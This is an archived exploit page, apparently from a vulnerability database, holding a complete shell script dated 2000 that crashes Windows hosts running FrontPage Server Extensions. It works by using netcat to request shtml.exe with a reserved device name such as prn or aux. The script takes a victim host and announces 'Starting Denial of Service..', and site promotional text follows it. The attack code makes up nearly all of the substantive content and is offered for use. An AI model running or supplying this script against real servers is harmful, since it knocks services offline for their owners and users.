`##############################################
# Frontpage Server Extension shtml.exe DoS
##############################################
# advisory by : www.Xato.net
# coded by : [email protected]
##############################################
# Devices who can cause a machine to crash are
# com1, prn, aux
#
# http://grazer.gz.ee
# looking for a team to join
#
# Vulnerable:
# Microsoft Windows 98
# Microsoft Windows 95
# Microsoft Windows NT 4.0
# Microsoft Windows NT 2000
#
#!/bin/sh
port=80
nc=/bin/nc
function usage {
clear
echo Usage : sh $0 "<frontpage.victim> <device>"
echo Example : sh $0 www.frontpage.com prn
echo " by grazer "
}
if [ $2x = x ]; then
usage
exit 1
fi
if [ -s $nc ]; then
clear
echo Starting Denial of Service..
echo "GET /_vti_bin/shtml.exe/$2.htm" |nc $1 $port
echo Now check if the machine is down.
else
clear
echo No NetCat found at $nc
exit 1
fi
# www.hack.co.za [6 September 2000]#`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation